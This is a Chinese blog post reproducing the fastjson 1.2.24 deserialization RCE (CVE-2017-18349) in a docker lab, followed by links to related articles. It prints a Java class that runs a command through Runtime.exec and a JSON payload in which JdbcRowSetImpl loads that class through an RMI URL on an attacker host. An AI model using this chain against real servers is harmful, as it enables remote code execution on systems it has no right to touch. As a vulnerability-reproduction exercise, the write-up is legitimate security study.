fastjson 1.2.24反序列化漏洞复现

最新推荐文章于 2024-09-10 15:45:44 发布
最新推荐文章于 2024-09-10 15:45:44 发布
阅读量626 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43227251/article/details/105971826
版权

简介

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。
在Java 8u102环境下,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。

环境

靶机:http://192.168.18.132:8090,使用docker起的靶机:

在这里插入图片描述将以下代码保存为TouchFile.java 使用javac编译(加粗处为远程命令执行的代码)

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {“touch", "/tmp/success”};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}}}

使用javac将代码编写为TouchFile.class类文件

并将生成的类文件放在另一台服务器web目录下,启动web服务。

访问主机A的ip地址加端口号(8090)并使用burp抓包,将请求包发到Repeater模块。

在这里插入图片描述
修改请求模式为POST,将content-type修改为application/json,然后在请求体中输入下面的JSON对象。(IP-2为开了rmi服务器地址的地址)

{

“a”:{

“@type”:“java.lang.Class”, “val”:“com.sun.rowset.JdbcRowSetImpl”

},

“b”:{ “@type”:“com.sun.rowset.JdbcRowSetImpl”, “dataSourceName”:“rmi://IP-2:4444/Exploit”,

“autoCommit”:true

} }
在这里插入图片描述rmi!服务器打开
这里的ip和是我08放了TouchFile.class文件的web服务器:后面的端口是监听的端口
在这里插入图片描述发送bp上修改好的包
出现这个
在这里插入图片描述在这里插入图片描述

qin9.
关注
阿里巴巴开源的FastJson 1反序列化漏洞复现流程
10-04
包含RMI服务所需的内容和测试使用的攻击FastJson1反序列化漏洞的Java文件
fastjson反序列化漏洞
scu_hacker博客
02-10 3381
目录 前言 一、漏洞原理 二、漏洞复现 2.1 fastjson<=1.2.24 2.2 1.2.24<=fastjson<=1.2.47 2.2.1在攻击机上编译 2.2.2 开启rmi和ldap服务 2.2.3 写入poc 参考资料 前言 fastjson是阿里开发的json解析库,可以将java对象解析json,也可以将json反序列化为java对象,主要用json.parse()方法进行反序列化。 一、漏洞原理 ...
最新fastjson反序列化漏洞分析
systemino的博客
08-02 3449
前言 写的有点多,可能对师傅们来说比较啰嗦,不过这么写完感觉自己也就明白了 poc newPoc.java import com.alibaba.fastjson.JSON; public class newPoc { public static void main(String[] argv) { String payload = "{"n...
fastjson1.2.24反序列化漏洞复现 CVE-2017-18349
最新发布
m0_62284238的博客
09-10 1656
fastjson反序列化漏洞复现 CVE-2017-18349
FastJson反序列化漏洞复现
小赵同学的博客
07-29 4003
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险,并调用危险连接远程RMI主机,通过其的恶意执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
fastjson反序列化漏洞原理及利用
weixin_43769253的博客
07-29 7046
fastjson反序列化漏洞原理及利用
【网络安全】Fastjson反序列化漏洞复现
kali_Ma的博客
12-26 2755
Fastjson提供了autotype功能,允许用户在反序列化数据通过“@type”指定反序列化型,Fastjson自定义的反序列化机制时会调用指定的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定的特定setter或者getter方法,若指定的指定方法有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
fastjson1.2.24反序列化RCE
06-24
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解** 在Java开发Fastjson一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...
Fastjson反序列化漏洞史1
08-03
然而,Fastjson在过去的几年里曾曝出一系列的反序列化漏洞,这些漏洞可能被攻击者利用,执行任意代码,从而对系统安全构成威胁。 在2020年5月8日的分析,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的...
fastjson反序列化过滤字段属性_Fastjson<=1.2.47反序列化漏洞复现及分析
weixin_39989033的博客
11-22 136
声明以下仅个人见解,有错误望提出.提到的poc勿滥用,恶意使用造成危害与本人无关.简介fastjson是由阿里开发的一种json解析器和生成器。在2019年6月26日,用户提出issue,存在远程代码执行的版本<=1.2.47.fastjson下载地址:fastjson​github.com环境准备 jdk 1.6.0.65 fastjson 1.2.47实验场景POC{复现采用jndi利...
fastjson =< 1.2.47 反序列化漏洞浅析
weixin_30341745的博客
07-12 248
fastjson =< 1.2.47 反序列化漏洞浅析 iiusky洛米唯熊今天 文章出处: https://www.03sec.com/3240.shtmlhttps://www.secquan.org/ 圈子社区牛逼!!! 作者:iiusky #poc {"name":{"@type":"java.lang.Class","val":"com.sun...
fastjson反序列化漏洞(1.2.47-rce)
siu~
10-18 613
FastJson解析json过程支持使用autoType实例化一个具体,并调用该类的set/get方法来访问属性。通过查找代码相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险,并调用危险连接远程rmi主机,通过其的恶意执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增
JNDI注入&amp;Log4j&amp;FastJson&amp;白盒审计&amp;不回显处理_log4j 攻击无回显怎么办(1)
2401_83739411的博客
04-15 574
在前后端数据传输交互,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其json以跨语言,跨前后端的优点在开发被频繁使用,基本上是标准的数据交换格式。它的接口简单易用,已经被广泛使用在缓存序列化,协议交互,Web输出等各种应用场景FastJson是阿里巴巴的的开源库,用于对JSON格式的数据进行解析和打包。Java 其实是有原生 Json 数据格式转换的,但由于 FastJson 速度更快,效率更高,所以被广泛使用
fastjson反序列化过滤字段属性_Fastjson<=1.2.47反序列化漏洞源码分析及复现
weixin_39997664的博客
11-22 230
简介fastjson 是由阿里开发的一种 json解析器和生成器。在 2019 年 6 月 26 日,用户提出issue[1],存在远程代码执行的版本<=1.2.47。环境准备jdk 1.6.0.65fastjson 1.2.47Let's HackPOC{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcR...
Fastjson反序列化漏洞复现(实战案例)
热门推荐
1
04-19 1万+
漏洞介绍 FastJson解析json过程支持使用autoType实例化一个具体,并调用该类的set/get方法来访问属性。通过查找代码相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险,并调用危险连接远程rmi主机,通过其的恶意执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据
vulhub复现fastjson1.2.47漏洞复现
m0_70483044的博客
07-14 2983
目录什么是jsonfastjson有啥用?什么是fastjsonjson语法规则为什么要引进AutoType漏洞原理怎么确认存在漏洞的?漏洞复现反弹shell。
Fastjson漏洞复现
Bird&Bird
09-28 3123
目录概述漏洞环境漏洞复现编写恶意编译并开启RMI服务 概述 fastjson解析json过程支持使用autoType实例化一个具体,并调用该类的set/get方法来访问属性。通过查找代码相关的方法,即可构造出一些恶意利用链。 漏洞环境 靶场选择使用vulhub搭建,网址:https://github.com/vulhub/vulhub 下载vulhub,找到fastjson/1.2.24-rce目录,使用docker-compose up -d启动环境。 docker ps -a 查看
fastjson反序列化漏洞复现过程
04-19
下面是fastjson反序列化漏洞复现过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要确定目标系统是否使用Fastjson,并且确定Fastjson的版本号。可以通过查看项目的依赖文件或者代码的导入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值